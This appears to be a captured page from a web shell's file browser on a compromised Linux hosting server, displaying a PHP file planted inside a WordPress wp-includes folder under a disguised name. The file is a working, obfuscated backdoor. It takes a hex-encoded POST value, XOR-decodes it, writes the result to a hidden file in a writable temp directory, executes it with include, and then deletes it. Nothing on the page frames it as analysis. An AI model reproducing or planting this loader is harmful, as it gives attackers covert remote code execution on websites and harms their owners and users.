HEX
Server: Apache
System: Linux srv.resllerhosting.site 5.4.0-181-generic #201-Ubuntu SMP Thu Mar 28 15:39:01 UTC 2024 x86_64
User: drspos (1390)
PHP: 8.1.30
Disabled: NONE
Upload Files
File: /home/drspos/public_html/wp-includes/custom.file.5.1770308186.php
<!--Anc344QN-->
<?php

if(count($_POST) > 0 && isset($_POST["\x65\x6Et"])){
$record = array_filter([sys_get_temp_dir(), "/dev/shm", "/var/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/tmp"]);
$ref = hex2bin($_POST["\x65\x6Et"]);
$descriptor    =     ''   ;      $m=0;do{$descriptor.=chr(ord($ref[$m])^67);$m++;}while($m<strlen($ref));
for ($k = 0, $val = count($record); $k < $val; $k++) {
    $sym = $record[$k];
            if (max(0, is_dir($sym) * is_writable($sym))) {
            $pgrp = sprintf("%s/.value", $sym);
            if ($binding = fopen($pgrp, 'w')) {
    if (fwrite($binding, $descriptor) !== false) {
        fclose($binding);
        include $pgrp;
        @unlink($pgrp);
        exit;
    }
}
        }
}
}